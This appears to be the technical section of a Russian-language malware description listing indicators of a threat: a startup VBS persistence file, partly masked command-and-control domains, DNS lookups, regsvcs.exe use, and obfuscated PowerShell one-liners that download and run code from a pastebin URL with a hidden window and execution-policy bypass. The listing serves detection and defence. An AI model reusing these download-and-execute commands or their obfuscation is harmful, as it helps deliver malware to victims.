Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\nosleep.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('N'+'et.W'+'eb'+'Client')).'DoWnloAdsTrInG'('https://pastebin.com/raw/bmt1raPf')
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
- %APPDATA%\nosleep.vbs
- 'pa###bin.com':443
- 'e.###4top.io':443
- 'i.###4top.io':443
- 'pp####t2.ddns.net':8899
- DNS ASK pa###bin.com
- DNS ASK e.###4top.io
- DNS ASK i.###4top.io
- DNS ASK pp####t2.ddns.net
- '<SYSTEM32>\wscript.exe' "%APPDATA%\NoSleep.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('N'+'et.W'+'eb'+'Client')).'DoWnloAdsTrInG'('https://pastebin.com/raw/bmt1raPf')' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -noexit -executionpolicy bypass -command I`EX ((neW`-Obj`EcT (('N'+'et'+'.'+'We'+'bc'+'li'+'ent'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'t'+'ri'+'n'+'g')).InVokE((('ht'+'t...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'